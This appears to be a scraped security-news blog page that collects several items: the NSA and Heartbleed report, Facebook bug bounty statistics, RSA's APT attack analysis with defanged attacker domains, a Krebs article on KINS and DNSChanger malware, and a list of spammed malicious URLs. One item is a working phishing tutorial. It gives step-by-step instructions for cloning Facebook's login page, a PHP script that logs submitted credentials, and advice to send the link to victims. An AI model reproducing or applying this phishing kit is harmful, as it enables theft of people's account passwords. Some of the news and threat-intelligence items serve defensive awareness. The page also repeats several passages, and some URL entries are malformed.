NSA knew about Heartbleed for two years

large-hero-heartbleed-2

The critical “Heartbleed” bug reported earlier this week to have affected the security of most of the internet was discovered by researchers at the United States National Security Agency two years earlier, according to a new report.

On Friday afternoon, Bloomberg News journalist Michael Riley reported that the NSA knew about the monstrous flaw for at least two years ahead of this week’s announcement, but kept it hidden from technologists and instead exploited it to hack the computers and correspondence of certain intelligence targets.

Earlier in the week, the open-source OpenSSL internet security project issued an emergency advisory after discovery of the Heartbleed bug revealed a weakness that may have for years allowed hackers to access online information otherwise thought to be protected by the SSL/TLS encryption standard used by around two-thirds of the web.

But according to sources that Riley says are familiar with the matter, the NSA kept details of the bug a secret shortly after first discovering it in early 2012 so that it could be added to the agency’s toolbox of exploits and hacks.

The agency found the Heartbeat glitch shortly after its introduction, according to one of the people familiar with the matter, and it became a basic part of the agency’s toolkit for stealing account passwords and other common tasks,” Riley wrote.

Putting the Heartbleed bug in its arsenal, the NSA was able to obtain passwords and other basic data that are the building blocks of the sophisticated hacking operations at the core of its mission, but at a cost,” he added. “Millions of ordinary users were left vulnerable to attack from other nations’ intelligence arms and criminal hackers.”

Shortly after Bloomberg published their report, agency spokeswoman Vanee Vines told the National Journal that the NSA “was not aware of the recently identified vulnerability in OpenSSL, the so-called Heartbleed vulnerability, until it was made public in a private-sector cybersecurity report.”

“Reports that say otherwise are wrong,” she said, dismissing Riley’s report.

In December, a five-person review group handpicked by US President Barack Obama to reassess the NSA’s intelligence gathering abilities said that the government must not stockpile details about any so-called “zero day” vulnerabilities, or flaws unknown to computer programs who have thus had “zero days” to patch them.

In almost all instances, for widely used code, it is in the national interest to eliminate software vulnerabilities rather than to use them for US intelligence collection,” the group told the president. “Eliminating the vulnerabilities — “patching” them — strengthens the security of US Government, critical infrastructure, and other computer systems.”

We recommend that, when an urgent and significant national security priority can be addressed by the use of a Zero Day, an agency of the US Government may be authorized to use temporarily a Zero Day instead of immediately fixing the underlying vulnerability.”

Pres. Obama has since asked Congress to adhere to one of that group’s recommendations — halting the government’s bulk collection of telephony metadata — but has not publically spoken of zero days before or after this week’s discovery of Heartbleed.

Previously, however, journalists and privacy advocates working with the trove of classified NSA documents disclosed last year by former contractor Edward Snowden said that the secretive intelligence agency had been undermining the very security of the internet by exploiting other flaws to hack targets.

At a security conference in December, expert Jacob Appelbaum from Germany’s Der Spiegel magazine said that the NSA had acquired the means to compromise any Apple iPhone in the world and occasionally relied on a number of high-tech tools and implants to hack targets.

Basically the NSA, they want to be able to spy on you. And if they have ten different options for spying on you that you know about, they have 13 ways of doing it and they do all 13. So that’s a pretty scary thing,”said Appelbaum, who previously spoke on behalf of WikiLeaks at a US conference and is a core member of the Tor anonymity project.

And since June, NSA leaks disclosed by Mr. Snowden have shown that the NSA has done everything from physically tapping into fiber optic undersea internet cables to get further access to the world’s communications, to tricking the systems administrators of private companies into installing malware that would open up their machines to American spies.

Read More...

Facebook pays bug hunters $1 million, India 2nd biggest recipient

India, which has over 78 million Facebook users, is second on the list of countries with the fastest-growing number of recipients of its Bug Bounty programme.(AP Photo)

Screen-facebookSocial networking giant Facebook said it has paid over $1 million in the past two years to security researchers who report bugs on its website, with India second among recipients by country.

India, which has over 78 million Facebook users, is also second on the list of countries with the fastest-growing number of recipients of its Bug Bounty programme.

 

A bug is an error or defect in software or hardware that causes a programme to malfunction. It often occurs due to conflicts in software when applications try to run in tandem.

While bugs can cause software to crash or produce unexpected results, certain defects can be used to gain unauthorised access to systems.

Facebook said it started the Bug Bounty programme a little more than two years ago to reward security researchers who report issues and to encourage people to help keep the site safe and secure.

India, which has over 78 million Facebook users, is second on the list of countries with the fastest-growing number of recipients of its Bug Bounty programme.(AP Photo)

India, which has over 78 million Facebook users, is second on the list of countries with the fastest-growing number of recipients of its Bug Bounty programme.(AP Photo)

“The programme has been even more successful than we’d anticipated,” Facebook said in a statement on its website.

“We’ve paid out more than $1 million in bounties and have collaborated with researchers from all around the world to stamp out bugs in our products and in our infrastructure,” said the statement. The social networking major said 329 people have received rewards, including professional researchers, students and part-timers. The youngest recipient was 13 years old.

A smartphone user shows the Facebook application on his phone in the central Bosnian town of Zenica.

A smartphone user shows the Facebook application on his phone in the central Bosnian town of Zenica.

“The countries with the most bounty recipients are, in order, the US, India, UK, Turkey, and Germany. The countries with the fastest-growing number of recipients are, in order, the US, India, Turkey, Israel, Canada, Germany, Pakistan, Egypt, Brazil, Sweden, and Russia,” it noted.

While the bug hunters are spread across 51 countries, 20% of the bounty paid so far have gone to US-based recipients, it added.

While the bug hunters are spread across 51 countries, 20% of the bounty paid so far have gone to US-based recipients, said a facebook statement.

While the bug hunters are spread across 51 countries, 20% of the bounty paid so far have gone to US-based recipients, said a facebook statement.

 

“Our Bug Bounty program allows us to harness the talent and perspective of people from all kinds of backgrounds, from all around the world,” Facebook security engineer Collin Greene said.

Two of the bounty recipients have taken up full-time jobs with the Facebook security team, he added.

 

Read More...

Hack Facebook with Phishing: An old and awesome way to hack accounts.!!

phishing

What is Phishing :

According to Wikipedia A phishing technique was described in detail in 1987, and (according to its creator) the first recorded use of the term “phishing” was made in 1995. Phishing is the act of attempting to acquire information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication.

Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current websecurity technologies.

phishing

How they do Phishing:

So now I am going to show you that how an attacker makes a phishing page and how they can get access to your social networking/e-mail account. So let me show you this demonstration on our favorite social networking site.

Step 1: First of all you need a free web hosting account which support PHP. Mostly hackers use:

www.000webhost.com

www.my3gb.com

www.100gb.co

www.x10hosting.com

So first register on one of the above site.

You will get a URL for your site.

Step 2: Now open www.facebook.com. If you are logged into your account then first logout of it or open this site in different browser. Now press Ctrl+U or right click on this login page and click on view source. Now copy this all source code and paste it into the new notepad file.

Step 3: Now save this notepad file with .html extension on your desktop or any other folder where you want. I am saving this file as index.html for this tutorial.

Step 4: Now open an another notepad file and paste the below code in it.

<?php
header (‘Location: http://www.facebook.com/ ‘);
$handler = fopen(“log.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handler, $variable);
fwrite($handler, “=”);
fwrite($handler, $value);
fwrite($handler, “\r\n”);
}
fwrite($handler, “\r\n”);
fclose($handler);
exit;
?>

Now save this notepad file with any name and .php extension. I am saving this as phish.php for this tutorial. In this code there is a name i.e. ‘log.txt’ you can put any name here with txt extension according to your choice.

Step 5: Now again open index.html file with notepad and find (Ctrl+F for find) keyword ‘action’. You will find like action=’http://www.facebook.com/*******’. Now remove the whole link after ‘=’ and put the name of your php file you have made before. I have used ‘phish.php’ name for that file so I will put this name after ‘=’. Now save this file again(Ctrl+s for save).

Step 6: Now upload both index.html and phish.php file to your free hosting account.

Now all you have to do is to send this link to the victim and make some social engineering.

When he will click on the link you have sent him he will get facebook login screen and when he will login to your account then you will get his username and password on a file named as ‘log.txt’.

Hope you liked it. Thanks. Please Share and Comment.

Read More...

Anatomy of an Attack

APT-chart1

I was on a tour in Asia Pacific when I first heard the news about the attack. The investigation into this attack continues but I’m eager to share some information with you about it.

Let’s first make sure everyone is on the same page. The number of enterprises hit by APTs grows by the month; and the range of APT targets includes just about every industry. Unofficial tallies number dozens of mega corporations attacked; examples are in the press regularly, and some examples are here, and here.

 

These companies deploy any imaginable combination of state-of-the-art perimeter and end-point security controls, and use all imaginable combinations of security operations and security controls. Yet still the determined attackers find their way in. What does that tell you?

The first thing actors like those behind the APT do is seek publicly available information about specific employees – social media sites are always a favorite.  With that in hand they then send that user a Spear Phishing email. Often the email uses target-relevant content; for instance, if you’re in the finance department, it may talk about some advice on regulatory controls.

The attacker in this case sent two different phishing emails over a two-day period. The two emails were sent to two small groups of employees; you wouldn’t consider these users particularly high profile or high value targets. The email subject line read “2011 Recruitment Plan.”

The email was crafted well enough to trick one of the employees to retrieve it from their Junk mail folder, and open the attached excel file. It was a spreadsheet titled “2011 Recruitment plan.xls.

The spreadsheet contained a zero-day exploit that installs a backdoor through an Adobe Flash vulnerability (CVE-2011-0609). As a side note, by now Adobe has released a patch for the zero-day, so it can no longer be used to inject malware onto patched machines.

OK, back to the attack. As you know, the next step in a typical APT is to install some sort of a remote administration tool that allows the attacker to control the machine.  In our case the weapon of choice was a Poison Ivy variant set in a reverse-connect mode that makes it more difficult to detect, as the PC reaches out to the command and control rather than the other way around. Similar techniques were reported in many past APTs, including GhostNet.

Having set remote access, now the attacker in a typical APT starts digital shoulder surfing to establish the employee’s role and their level of access. If this isn’t sufficient for the attackers’ purpose, they will seek user accounts with better, more relevant, privileges. I’ve pieced together a separate blog post as an appendix, talking about the attack end-to-end and providing more data.

When it comes to APTs it is not about how good you are once inside, but that you use a totally new approach for entering the organization.  You don’t bother to just simply hack the organization and its infrastructure; you focus much more of your attention on hacking the employees.

One cannot stress enough the point about APTs being, first and foremost, a new attack doctrine built to circumvent the existing perimeter and endpoint defenses. It’s a little similar to stealth air fighters: for decades you’ve based your air defense on radar technology, but now you have those sneaky stealth fighters built with odd angles and strange composite materials.   You can try building bigger and better radars, or, as someone I talked to said, you can try staring more closely at your existing radars in hope of catching some faint signs of something flying by, but this isn’t going to turn the tide on stealthy attackers. Instead you have to think of a new defense doctrine.

Building a new defense doctrine takes time, but over the course of history many campaigns that required building a new defense doctrine were eventually won. The battle of the Atlantic is a good example. For years it was completely controlled by U-boat ‘Wolf Packs’, which were so effective in cutting Britain off from fuel and supplies that in early 1943 there was talk of stopping U.S. aid altogether.

But in mid 1943 the tide turned through a combination of smart leadership by newly appointed Admiral Horton of the Royal Navy, advancements in defensive technologies, as well as new tactics used by allied aircrafts and escort ships. A new defense doctrine was born, and it worked like a charm.

And we don’t even have to go back that far. I still vividly remember the first Phishing attacks against online banks. IT security departments spent many long nights, trying to figure out what to do against sneaky attackers who didn’t bother at all with all the millions poured into securing the infrastructure, attacking instead the weakest element in the chain: the humans.

Recently the UK payment council announced that in 2010 online banking fraud declined 22%, despite phishing levels increasing 21%. This is turning the tide. It took the financial sector 7 years to build a new defense doctrine against social engineering attacks like Phishing and Trojans. I was part of this gargantuan effort, and I think we’ve learned a thing or two that can help us build a new defense doctrine against APTs much faster. Already we’re learning fast, and every organization hit by an APT is much more prepared against the next one; I’m confident it will take us far less than 7 years to say we’ve turned the tide on APTs.

Now let me point out a couple of additional points regarding the attack.

First, while RSA made it clear that certain information was extracted, it’s interesting to note that the attack was detected by its Computer Incident Response Team in progress; I’ve been talking to many CISOs in corporations that were hit by similar APTs and a lot of companies either detected the attacks after months, or didn’t detect them at all and learned about it from the government. This is not a trivial point: by detecting what is happening early on, RSA was able to respond quickly and engage in immediate countermeasures.

The other point I’d like to make is that the new defense doctrine is shaping up faster than I thought. We’re already working hard on introducing several completely new approaches; they map to some of the strategic directions I outlined in the end of the blog post here.

It is also important to note that just as stealth fighters evade radar instead of defeating it, APTs do not “defeat” security products. They just find ways to fly below the existing technology. Our incident response team and their technical array – a lot of it using RSA technologies – did enable us to identify the attack in progress and respond accordingly. That’s further proof that one key element is the people, not just the technology.

Well, guys, I think that’s all for now. I plan to write additional blogs in the coming days covering other aspects of the unfolding events, and as I mentioned there’s an appendix at the end of this blog with an end-to-end description of the attack.

I just want to leave you with one thought. What we’re witnessing now are the early days. We’re now in 1939, and U-boats are an impossible menace. We’re now in 2004, and social engineering attacks get away with our customer’s money. We’re now in 2011, and the tidal wave of targeted attacks has reached our shores.  It’s time to respond as an industry, define and execute a new defense doctrine based on information sharing, deep analytics and advanced threat management.

We’re headed into an interesting decade, but in the end I have confidence, the good guys will prevail.

Anatomy of an Attack (Appendix)

 

Before reading this, you should read the blog entitled ’Anatomy of an Attack’, which describes the attack on RSA at a high level. This post is an add-on, a sort of appendix really, that provides some end-to-end visibility into the various stages of the attack.

Advanced Persistent Threat attacks typically have three main phases. The first is the social engineering attack; that’s one of the key elements that differentiates an APT from good old hacking. From the very first mention of APTs it’s been clear that these attacks will be difficult to defend against, as they use a combination of social engineering with vulnerabilities in the end-point to access users’ PCs. Once inside you’re already in the network; you just have to find your way to the right users and systems, and carry on with “regular” hacking activities.

End-point security struggles with protecting against more simple form attacks such as data stealing Trojans, which is why you can find so many examples of ZeusiLeaks, or employees compromised with a Trojan that grabs the corporate data and sends it to a Trojan mothership halfway across the world. If Trojans available for sale from every digital thug on the cyber block are getting through the perimeter, what should we expect when it comes to the more devious attacks that are currently launched against private sector companies?

The social engineering part is equally simple. Like I mentioned in a previous blog that focused on some long-term defense strategies against APTs, just think of what has changed in the past few decades. In the early 1980s you would have guys like Matthew Broderick in War Games, searching for modems connected to sensitive networks. Matthew mapped networks and found weak spots. His attacks had nothing to do with the users; he used weaknesses in the infrastructure. But if Matthew was staging an APT hack today, the first thing he’d do is visit social media sites. He’d collect intelligence on the organizations’ people, not infrastructure. Then he’d send a spear phishing email to the employees of interest.

APT-chart1

In our case the attacker sent two different phishing emails over a two-day period. These emails were sent to two small groups of employees. When you look at the list of users that were targeted, you don’t see any glaring insights; nothing that spells high profile or high value targets.

The email subject line read “2011 Recruitment Plan”. This was intriguing enough for one of the employees to actually pull the email out of their Junk Box and double-click on the email attachment, which was an excel spreadsheet titled “2011 Recruitment plan.xls”.

The spreadsheet contained a zero-day exploit that installs a backdoor through Adobe Flash vulnerability (CVE-2011-0609). Adobe has already released an emergency patch for the zero-day. The exploit injects malicious code into the employee’s PC, allowing full access into the machine. The attacker in this case installed a customized remote administration tool known as Poison Ivy RAT variant; if you are familiar with APTs you will recognize Poison Ivy as it has been used extensively in many other attacks, including GhostNet. Often these remote administration tools, the purpose of which is simply to allow external control of the PC or server, are set up in a reverse-connect mode: this means they pull commands from the central command & control servers, then execute the commands, rather than getting commands remotely. This connectivity method makes them more difficult to detect, as the PC reaches out to the command and control rather than the other way around. You’ll find references of Remote Administration tools here, including Poison Ivy – which you can also download yourself in pure form off the Internet.

The next phase of an APT is moving laterally inside the network once it’s compromised some of the employee PCs. The thing is, the initial entry points are not strategic enough for the attackers; they need users with more access, more admin rights to relevant services and servers, etc.

This is one of the key reasons why, having failed to prevent the initial social engineering phase, detecting it quickly is so important. In many of the APTs publicized in the last 18 months the attackers had months to do digital “shoulder surfing” on the attacked users, map the network and the resources, and start looking for a path to the coveted assets they desired. Then they use the compromised accounts, coupled with various other tactics, to gain access to more “strategic” users. In the RSA attack the timeline was shorter, but still there was time for the attacker to identify and gain access to more strategic users.

The attacker first harvested access credentials from the compromised users (user, domain admin, and service accounts). They performed privilege escalation on non-administrative users in the targeted systems, and then moved on to gain access to key high value targets, which included process experts and IT and Non-IT specific server administrators.

If the attacker thinks they can exist in the environment without being detected, they may continue in a stealth mode for a long while. If they think they run the risk of being detected, however, they move much faster and complete the third, and most “noisy”, stage of the attack. Since RSA detected this attack in progress, it is likely the attacker had to move very quickly to accomplish anything in this phase.

In the third stage of an APT, the goal is to extract what you can. The attacker in the RSA case established access to staging servers at key aggregation points; this was done to get ready for extraction. Then they went into the servers of interest, removed data and moved it to internal staging servers where the data was aggregated, compressed and encrypted for extraction.

The attacker then used FTP to transfer many password protected RAR files from the RSA file server to an outside staging server at an external, compromised machine at a hosting provider. The files were subsequently pulled by the attacker and removed from the external compromised host to remove any traces of the attack.

I hope this description provides information that can be used to understand what has happened and correlate with other APTs.  In addition three URLs associated with this attacker are:

Good[DOT]mincesur[DOT]com | up82673[DOT]hopto[DOT]org | www[DOT]cz88[DOT]net

Perhaps this incident can be used as an exercise when you look at your own infrastructure and wonder what mitigation options you have against similar attacks.  I gave my thoughts on the matter in the main blog post, and can summarize them like this: there’s a reason why APTs are so dangerous, and it has to tell us something. As an industry, we have to act fast and develop a new defense doctrine; the happy days of good old hacking are gone, and gone too are the old defense paradigms. New threats call for new strategies.

At RSA we’re already learning fast, making both small-term hardening moves and giant strides towards establishing a whole new defense doctrine. We’re implementing techniques that just a couple of weeks ago I thought were in the realm of long-term roadmaps.

There are so many historic examples of campaigns that seemed hopeless at the time but were then turned through sheer will, creativity and leadership; I’m sure that in a few years, Advanced Persistent Threats will become a familiar, almost mainstream form of attack and that we’ll be able to deploy effective defenses against those who want to spy and control on our intellectual property, digital assets and critical infrastructure.

Read More...

What is in a Name: Information Security Intelligence

why-information-security-is-needed-hackeinstein

One of the more elusive concepts in information security is that of information security intelligence.  Often times when discussing intelligence images of shadowy figures conducting espionage are evoked and the truth of the matter is that often times this is not far from the truth.  Information security intelligence means many things to many people yet no one can argue against the value that it provides.  When discussing information security intelligence we need to ask ourselves what it is and how we can apply it to our enterprise infrastructure in a way that is both meaningful and actionable.  However, before we get to the point of discussing the value that information security intelligence offers to enterprises, we need to be comfortable with a working definition of what information security intelligence is.

The word intelligence is derived from the Latin verb intelligere.  Intelligere is derived from inter-legere, which means to “pick out” or “discern”.  In the middle ages a variation of this verb, intellectus, became the term used for “understanding” or “comprehension”.  Intelligence provides us the ability to discern or comprehend information as it is presented to us from disparate sources.   Likewise, information security intelligence allows us to discern or comprehend information related to threats and vulnerabilities (logical or physical).  As a result, information security intelligence can be defined as the understanding of threats or possible threats.  With Blackhat USA only a few weeks away, I am sure we will be hearing more and more about the vital role that information security intelligence plays in our defensive measures.

Source: RSA

Read More...

Haunted by the Ghosts of ZeuS & DNSChanger

rsakins

One of the challenges in malware research is separating the truly novel innovations in malcoding from new nasties that merely include nominal or superficial tweaks. This dynamic holds true for both malware researchers and purveyors, albeit for different reasons. Researchers wish to avoid being labeled alarmist in calling special attention to what appears to be an emerging threat that turns out to be old news; the bad guys just want to avoid getting scammed into paying for an old malware kit dressed up as the new next big thing.

Since December 2012, when the spokesperson of the Citadel team took the Trojan off the semi-open underground market, cyber criminals have been scrambling to find a replacement,” RSA’s Limor Kessem wrote. “In early February 2013, RSA fraud intelligence researchers began tracing hints about a new crimeware tool called ‘KINS’. At the time, the information about the Trojan just a rumor, but in sporadic comments, fraudsters were associating a Trojan named KINS with the Citadel source code, looking for its developer in order to reach out to him and purchase KINS. The rumors were soon hushed and ties to Citadel were denied, mostly in what appeared as a case of fearful fraudsters who did not want to be denied the possibility to buy the next Trojan.”

But according to Fox-IT, a security research and consulting group based in The Netherlands, KINS has been used in private since at least December 2011 to attack financial institutions in Europe, specifically Germany and The Netherlands. Fox-IT says KINS is short for “Kasper Internet Non-Security,” which is likely the malware author’s not-so-subtle dig at the security suite offered by Russian antivirus maker Kaspersky.

Source: Fox-IT

Source: Fox-IT

In its own analysis of the banking Trojan malware, Fox-IT said KINS is fully based on the leaked ZeuS source code, and includes only minor additions. What’s more, Fox-IT notes, many of the users of KINS have already migrated to yet another ZeuS variant, suggesting that perhaps they were unsatisfied with the product and that it didn’t deliver as advertised.

“While the technical additions are interesting, they are far from ground breaking,” wroteMichael Sandee, principal security expert at Fox-IT. “With an array of fairly standard features, and relatively simple additions to the standard ZeuS, such as reporting of installed security product information, the malware platform does not bring anything really new. There are however some features of this malware, not aimed at the functionality for the person using it, but aimed at complicating malware analysis.”

OLD MALWARE, NEW PAINTJOB?

From the bad-guy perspective, this infighting over malware innovation is on display in a new malware offering that surfaced today on a semi-private forum: The seller is pitching a resurrected and modified version of the DNSChanger Trojan, a global contagion that once infected millions of PCs. The DNSChanger botnet, which hooked into infected systems quite deeply and spread to both Windows and Mac computers, was eradicated only by a worldwide, concerted digital quarantine and vaccination effort — combined with the arrest of its creators.

 

As its name suggests, DNSChanger works by hijacking the domain name system (DNS) server settings on a computer; these settings point to Internet servers that are responsible for translating human-friendly domain names like example.com into numeric Internet addresses that are easier for computers to understand. DNS Changer swapped out victims’ legitimate DNS server settings with the addresses of DNS Servers controlled the malware’s creators. Armed with that control, the defendants could redirect any part of the Web browsing session on an infected user’s computer.

The original DNSChanger was used to conduct click fraud and to steal advertising revenues. This new version, dubbed Trend DNSChanger Bot, also hijacks the host machine’s DNS settings but with the purpose of extracting a ransomware payment from the victim. Ransomware locks the victim’s PC until he either pays the ransom or finds a way to remove the malware. Victims are instructed to pay the ransom by purchasing prepaid MoneyPakPaySafeor Ukash cards, sold at everything from Walgreens to Wal-Mart. Victims are then told to send the attackers a 14-digit voucher code that allows the bad guys to redeem those vouchers for cash.

The author of Trend DNSChanger Bot claims his malware includes the best of its predecessor —  including a powerful rootkit designed to make the code difficult to detect and remove — as well as the blocking of any Internet traffic between the host machine and antivirus and security vendors. The twist, according to the author, is in how it seeks to monetize hacked PCs.

Ransomware is most often distributed via hacked or malicious sites that exploit browser vulnerabilities.  Typically, these scams impersonate the Department of Homeland Security or the FBI (or the equivalent federal investigative authority in the victim’s country) and try to frighten people into paying fines to avoid prosecution for supposedly downloading child pornography and pirated content.

The maker of Trend DNSChanger bot says his malware will invoke messaging from the victim’s own Internet service provider, warning of illicit activity and demanding fines for alleged infractions of the ISP’s terms of service.

Imagine a user…seeing a message that their computer is locked, with the logos of its Internet service provider, the name of the provider, and the city in which [the victim] lives. According to our tests, it is very scary and makes them pay.”

“We made it so that it locks the [victim's browser] to display a page [that mimics] major and medium-sized ISPs in each country in which you work. Imagine a user…seeing a message that their computer is locked, with the logos of its Internet service provider, the name of the provider, and the city in which [the victim] lives. According to our tests, it is very scary and makes them pay.”

It’s not clear whether this purportedly new version of DNSChanger will be embraced by the underground, or indeed will ever come close to inflicting the damage done by its predecessor. For now, the underground community appears interested but skeptical. Several members of the fraud forum where this malware is being sold say it bears strong resemblance to a project announced to great fanfare in 2012, only to be abandoned by its author.

Interestingly, the author of this upstart DNSChanger clone says he was part of the team that coded the original DNSChanger malware, but allows that his innovations are essentially incremental and that parts of his malware first emerged in the above-mentioned KINS Trojan. “In fact, we are not the first who came up with this technology,” the malware author “Trend” wrote. “It was first used in the KINS Trojan. Our team worked on DNSChanger, which is known throughout the world. But this project is only the official version that appeared in 2007. So the technology itself is not new.”

Source: http://krebsonsecurity.com/2013/07/haunted-by-the-ghosts-of-zeus-dnschanger/

Read More...

Spammed URLs for the Snowden, Ender, Obama, and Tree Campaigns

snowden-obama-malware

obama 198.251.67.11 /incumbency/index.html
obama 198.251.67.11 /philippine/index.html
obama 198.251.67.11 /stifles/index.html
snowden 198.251.67.11 /campaigners/index.html
snowden 198.251.67.11 /foxhole/index.html
snowden 198.251.67.11 /fracturing/index.html
snowden 198.251.67.11 /incumbency/index.html
tree 198.251.67.11 /nomadic/index.html
tree 198.251.67.11 /philippine/index.html
tree 198.251.67.11 /reprehended/index.html
tree 198.251.67.11 /sauciness/index.html
tree 198.251.67.11 /sonya/index.html
snowden 198.251.67.11 /voodooing/index.html
ender 198.61.134.93 /decompressed/index.html
ender 198.61.134.93 /dinosaur/index.html
ender 198.61.134.93 /microeconomics/index.html
ender 198.61.134.93 /packard/index.html
ender 198.61.134.93 /reprimanding/index.html
ender 198.61.134.93 /sash/index.html
ender 51956147.de.strato-hosting.eu /radicalism/index.html
ender 51956147.de.strato-hosting.eu /remote/index.html
ender 51956147.de.strato-hosting.eu /soyinka/index.html
obama 96.9.7.80 /draftier/index.html
tree 96.9.7.80 /coif/index.html
tree 96.9.7.80 /contentious/index.html
snowden 96.9.7.80 /imperiling/index.html
snowden 96.9.7.80 /implausibilities/index.html
tree 96.9.7.80 /slaloming/index.html
snowden 96.9.780 /imperiling/index.html
ender adeseye.me.pn /clunkier/index.html
ender adeseye.me.pn /incest/index.html
ender adeseye.me.pn /mischancing/index.html
ender adeseye.me.pn /rarest/index.html
ender adeseye.me.pn /uglies/index.html
ender andywinnie.com /albert/index.html
ender andywinnie.com /anywheres/index.html
ender andywinnie.com /chairing/index.html
ender andywinnie.com /fits/index.html
ender andywinnie.com /network/index.html
ender andywinnie.com /preservation/index.html
ender aptword.com.my /dromedaries/index.html
ender aptword.com.my /incurred/index.html
ender aptword.com.my /interpol/index.html
ender aptword.com.my /translations/index.html
ender aptword.com.my /vietminh/index.html
obama assuredpropertycare.net /overlying/index.html
obama assuredpropertycare.net /sneezes/index.html
tree assuredpropertycare.net /arrhenius/index.html
snowden assuredpropertycare.net /changed/index.html
snowden assuredpropertycare.net /debaucheries/index.html
snowden assuredpropertycare.net /dulls/index.html
tree assuredpropertycare.net /dulls/index.html
snowden assuredpropertycare.net /overlying/index.html
tree assuredpropertycare.net /premeditation/index.html
tree assuredpropertycare.net /shekels/index.html
snowden assuredpropertycare.net /sneezes/index.html
obama bbsmfg.biz /belaying/index.html
obama bbsmfg.biz /lather/index.html
tree bbsmfg.biz /activists/index.html
snowden bbsmfg.biz /intellectualize/index.html
snowden bbsmfg.biz /lather/index.html
tree bbsmfg.biz /servo/index.html
tree bbsmfg.biz /skiing/index.html
tree bbsmfg.biz /tourist/index.html
snowden bbsmfgbiz /intellectualize/index.html
snowden bbsmfgbiz /lather/index.html
ender bestpaintinginc.org /candidacy/index.html
ender bestpaintinginc.org /enmeshes/index.html
ender bestpaintinginc.org /genitives/index.html
ender bestpaintinginc.org /hardly/index.html
ender bestpaintinginc.org /parser/index.html
obama bordihn.net /rubik/index.html
snowden bordihn.net /gnarl/index.html
tree bordihn.net /gnarl/index.html
tree bordihn.net /gushing/index.html
tree bordihn.net /reformulates/index.html
snowden bordihn.net /squirreling/index.html
tree bordihn.net /squirreling/index.html
ender chad.westhostsite.com /addle/index.html
ender chad.westhostsite.com /augmenting/index.html
ender chad.westhostsite.com /buttonholes/index.html
ender chad.westhostsite.com /expend/index.html
ender chad.westhostsite.com /shillings/index.html
ender chad.westhostsite.com /unfailing/index.html
ender CHALONE.COM.SG /ebbed/index.html
ender CHALONE.COM.SG /homy/index.html
ender CHALONE.COM.SG /saddling/index.html
obama deerstalkersbop.org.nz /evelyn/index.html
snowden deerstalkersbop.org.nz /absconding/index.html
tree deerstalkersbop.org.nz /actioning/index.html
tree deerstalkersbop.org.nz /bathroom/index.html
snowden deerstalkersbop.org.nz /dissatisfied/index.html
tree deerstalkersbop.org.nz /dissatisfied/index.html
snowden deerstalkersbop.org.nz /tran/index.html
obama dtgcommunity.com /imprimatur/index.html
snowden dtgcommunity.com /electroencephalographs/index.html
tree dtgcommunity.com /electroencephalographs/index.html
snowden dtgcommunity.com /gentlefolk/index.html
tree dtgcommunity.com /gunpoint/index.html
tree dtgcommunity.com /ingresses/index.html
snowden dtgcommunity.com /parachutists/index.html
tree dtgcommunity.com /seesawing/index.html
snowden dtgcommunity.com /thwacked/index.html
snowden dtgcommunity.com /tzar/index.html
tree edition.cnn.com /
obama ekaterini.mainsys.gr /bloodier/index.html
obama ekaterini.mainsys.gr /habitual/index.html
tree ekaterini.mainsys.gr /habitual/index.html
snowden ekaterini.mainsys.gr /livelongs/index.html
tree ekaterini.mainsys.gr /oxymora/index.html
snowden ekaterini.mainsys.gr /peddle/index.html
snowden ekaterini.mainsys.gr /prithee/index.html
tree ekaterini.mainsys.gr /suggested/index.html
snowden ekaterini.mainsys.gr /voled/index.html
tree ekaterini.mainsys.gr /voled/index.html
ender fermatabow.com /clinicians/index.html
ender fermatabow.com /depicting/index.html
ender fermatabow.com /fairyland/index.html
obama ftp.suavva.com /initiators/index.html
obama ftp.suavva.com /riverbed/index.html
obama ftp.suavva.com /sousa/index.html
snowden ftp.suavva.com /overstatements/index.html
tree ftp.suavva.com /sousa/index.html
tree ftp.suavva.com /surges/index.html
obama fuhr-haustechnik.de /resubmit/index.html
tree fuhr-haustechnik.de /attempted/index.html
tree fuhr-haustechnik.de /continua/index.html
tree fuhr-haustechnik.de /impartially/index.html
snowden fuhr-haustechnik.de /recollecting/index.html
tree fuhr-haustechnik.de /recollecting/index.html
tree fuhr-haustechnik.de /taboo/index.html
snowden fuhr-haustechnik.de /unswerving/index.html
ender gbihongkong.org /boer/index.html
ender gbihongkong.org /economist/index.html
ender gbihongkong.org /inconsiderately/index.html
ender gbihongkong.org /unenlightened/index.html
ender grape.wurster.ws /filtration/index.html
ender grape.wurster.ws /geisha/index.html
ender grape.wurster.ws /pagans/index.html
ender grape.wurster.ws /rationalized/index.html
ender grape.wurster.ws /spica/index.html
ender grape.wurster.ws /suntans/index.html
snowden hackspitz.com /adidas/index.html
snowden hackspitz.com /candied/index.html
snowden hackspitz.com /impropriety/index.html
tree hackspitz.com /kook/index.html
tree hackspitz.com /penetrable/index.html
obama hotelnewyorkbd.com /twill/index.html
tree hotelnewyorkbd.com /bayou/index.html
snowden hotelnewyorkbd.com /doyens/index.html
tree hotelnewyorkbd.com /doyens/index.html
snowden hotelnewyorkbd.com /fiftieths/index.html
snowden hotelnewyorkbd.com /hill/index.html
snowden hotelnewyorkbd.com /preyer/index.html
tree hotelnewyorkbdcom /bayou/index.html
ender ic44.com /bulgarian/index.html
ender ic44.com /byword/index.html
ender ic44.com /flourishes/index.html
ender ic44.com /ganglier/index.html
ender ic44.com /sundry/index.html
ender isgett.org /ambling/index.html
ender isgett.org /besmirched/index.html
ender isgett.org /daybed/index.html
ender isgett.org /discriminatory/index.html
ender isgett.org /flux/index.html
ender isgett.org /tanzania/index.html
obama jobarium.com /sham/index.html
snowden jobarium.com /benefactresses/index.html
snowden jobarium.com /hobos/index.html
tree jobarium.com /melissa/index.html
obama joerg.gmxhome.de /ease/index.html
obama joerg.gmxhome.de /freezes/index.html
snowden joerg.gmxhome.de /ease/index.html
snowden joerg.gmxhome.de /enumerated/index.html
tree joerg.gmxhome.de /enumerated/index.html
snowden joerg.gmxhome.de /harvester/index.html
tree joerg.gmxhome.de /skeptically/index.html
tree kassos.gr /bode/index.html
tree kassos.gr /chosen/index.html
snowden kassos.gr /dragooning/index.html
snowden kassos.gr /futility/index.html
snowden kassos.gr /golf/index.html
snowden kassos.gr /walkways/index.html
tree kassos.gr /walkways/index.html
snowden kassosgr /futility/index.html
snowden kassosgr /golf/index.html
obama kryokontur.fr /biopsy/index.html
obama kryokontur.fr /brows/index.html
obama kryokontur.fr /kern/index.html
obama kryokontur.fr /nosh/index.html
tree kryokontur.fr /alternator/index.html
